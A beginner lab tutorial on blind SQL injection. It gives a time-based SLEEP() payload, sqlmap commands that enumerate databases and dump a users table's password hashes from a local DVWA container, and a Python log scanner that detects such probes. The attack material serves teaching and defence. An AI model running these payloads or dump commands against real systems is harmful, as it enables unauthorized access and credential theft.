Web Application Vulnerability: SQL Injection (Blind)

Beginner

Introduction

In this lab, you will learn how to exploit SQL injection vulnerabilities in web applications through blind SQL injection techniques. SQL injection is a code injection technique that exploits security vulnerabilities in an application's software by inserting malicious SQL statements into application entry fields. Blind SQL injection refers to scenarios where the application does not provide any error messages or output, making it more challenging to detect and exploit vulnerabilities. The goal of this lab is to understand blind SQL injection and learn how to use the powerful SQLmap tool to automate the exploitation process.

Understanding Blind SQL Injection

Blind SQL injection is a type of SQL injection attack where the application does not provide any error messages or output. Unlike regular SQL injection, where you can observe error messages or the results of your injected SQL queries, blind SQL injection requires a different approach to detect and exploit vulnerabilities.

In this step, we will explore the concept of time-based blind SQL injection, which is a technique used to detect and exploit blind SQL injection vulnerabilities by leveraging time delays. The idea behind time-based blind SQL injection is to inject SQL queries that include a delay function, such as SLEEP() in MySQL. If the injected SQL query is successful, the application will pause for the specified amount of time before returning a response, indicating the presence of a vulnerability.

Here's an example of a time-based blind SQL injection query:

1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2, SLEEP(5), 0) AND '1'='1

In this query, the IF statement checks if the number of tables in the current database is equal to 2. If the condition is true, the SLEEP(5) function will pause the execution for 5 seconds before returning a response. If the condition is false, the execution will continue without any delay.

By measuring the response time, you can infer the result of the injected condition. A response delayed by roughly the SLEEP() interval indicates that the injected SQL executed and the condition was true; a normal response time means either the condition was false or the input was not injected into the query at all, so several probes with different conditions are needed before drawing a conclusion.
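The same timing signal is visible from the server side. As an added detection example (not part of the lab), the script below scans constructed access-log lines for the delay primitives used in the payload above and correlates them with the recorded request time; the log format with an appended rt= field and all sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample (not from the lab): Nginx-style access log with the request
# time appended as rt=<seconds>. Line 3 is the URL-encoded form of the time-based
# payload quoted above; line 4 is a benign value containing the substring "SLEEP";
# line 5 is a slow but ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4127 rt=0.031
10.0.0.5 - - [12/Mar/2024:10:01:03 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4125 rt=0.028
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%20WHERE%20table_schema%3Ddatabase%28%29%29%3D2%2C%20SLEEP%285%29%2C%200%29%20AND%20%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4127 rt=5.019
10.0.0.7 - - [12/Mar/2024:10:01:20 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20SLEEPY&Submit=Submit HTTP/1.1" 200 4127 rt=0.030
10.0.0.3 - - [12/Mar/2024:10:01:25 +0000] "GET /vulnerabilities/sqli_blind/?id=3&Submit=Submit HTTP/1.1" 200 4125 rt=4.600
"""

# One access-log line: client, identity, user, timestamp, request line, status, bytes, rt=.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ rt=(?P<rt>[\d.]+)$'
)
# MySQL delay primitives used by time-based probes, plus the metadata schema the
# payload reads. The word boundary and "(" keep values such as "SLEEPY" from matching.
DELAY_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(|\binformation_schema\b", re.I)


def analyze(log_text, slow_seconds=4.0):
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rt = float(m["rt"])
        # parse_qsl percent-decodes the values, so the regex sees the raw SQL text.
        params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
        hits = {k: DELAY_RE.findall(v) for k, v in params if DELAY_RE.search(v)}
        if not hits and rt < slow_seconds:
            continue
        if hits and rt >= slow_seconds:
            confidence = "high"    # delay keyword present AND the delay was observed
        elif hits:
            confidence = "medium"  # keyword present, no delay: condition false or blocked
        else:
            confidence = "low"     # slow only: may simply be an ordinary slow page
        findings.append({
            "ip": m["ip"], "rt": rt, "confidence": confidence,
            "params": sorted(hits),
            "keywords": sorted({kw.upper() for kws in hits.values() for kw in kws}),
        })
    return findings
```

Run against SAMPLE_LOG, analyze() reports the payload line from 10.0.0.9 as high confidence and the slow benign request from 10.0.0.3 as low confidence only, which is the triage order an analyst would want.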

Exploring SQLmap

SQLmap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. In this step, we will learn how to use SQLmap to perform blind SQL injection attacks.

First, ensure that SQLmap is installed on your system. If not, you can install it using the following command:

sudo apt-get install sqlmap

Once SQLmap is installed, you can run it against a vulnerable web application to detect and exploit SQL injection vulnerabilities. Here's an example command:

sqlmap -u "http://example.com/vulnerable.php?id=1" --dbs

In this command:

  • -u specifies the URL of the vulnerable page, including any parameters.
  • --dbs instructs SQLmap to enumerate the available databases on the target system.

SQLmap will perform various techniques, including blind SQL injection, to retrieve information from the target system. It will display the results in the terminal.

Other useful SQLmap options include:

  • --tables to list the tables in a database
  • --columns to list the columns of a table
  • --dump to retrieve the data from a table

Here's an example command to retrieve data from a table:

sqlmap -u "http://example.com/vulnerable.php?id=1" -D database_name -T table_name --columns --dump

In this command:

  • -D specifies the database name
  • -T specifies the table name
  • --columns lists the columns of the specified table
  • --dump retrieves the data from the specified table

SQLmap provides various other options and features to customize the attack and gather more information. It's recommended to explore the SQLmap documentation and practice on vulnerable systems to better understand its capabilities.

Hands-on Practice with SQLmap

In this step, you will practice using SQLmap to perform blind SQL injection attacks against a vulnerable web application. Follow the instructions below:

  1. Start the vulnerable web application by running the following command:

    docker run --rm -p 8080:80 vulnerables/web-dvwa

    This command will start a Docker container running the Damn Vulnerable Web Application (DVWA) on http://localhost:8080.

  2. Open a web browser and navigate to http://localhost:8080. You should see the DVWA login page.

  3. Log in with the default credentials:

    • Username: admin
    • Password: password

  4. Once logged in, navigate to the "DVWA Security" page and set the security level to "Low".

  5. Open a new terminal and run the following SQLmap command:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" --dbs

    Replace YOUR_PHPSESSID_VALUE with the actual value of the PHPSESSID cookie obtained from your browser.

  6. SQLmap will attempt to detect and exploit the blind SQL injection vulnerability. It will first display the database management system (DBMS) information and then list the available databases.

  7. Next, run the following command to retrieve the table names from the DVWA database:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" -D dvwa --tables

  8. Finally, retrieve the data from the users table by running the following command:

    sqlmap -u "http://localhost:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=YOUR_PHPSESSID_VALUE" -D dvwa -T users -C user,password --dump

    This command will display the usernames and password hashes from the users table.

Throughout this process, observe the output from SQLmap and understand how it detects and exploits the blind SQL injection vulnerability to retrieve sensitive information from the database.

Summary

In this lab, you learned about blind SQL injection, a type of SQL injection attack where the application does not provide any error messages or output. You explored the concept of time-based blind SQL injection and how to leverage time delays to detect and exploit vulnerabilities. Additionally, you learned how to use the powerful SQLmap tool to automate the process of detecting and exploiting SQL injection vulnerabilities, including blind SQL injection. Through hands-on practice, you gained experience in using SQLmap to retrieve database information, table names, and sensitive data from a vulnerable web application. This lab provided you with a solid understanding of blind SQL injection and the tools and techniques used to identify and exploit these vulnerabilities effectively.
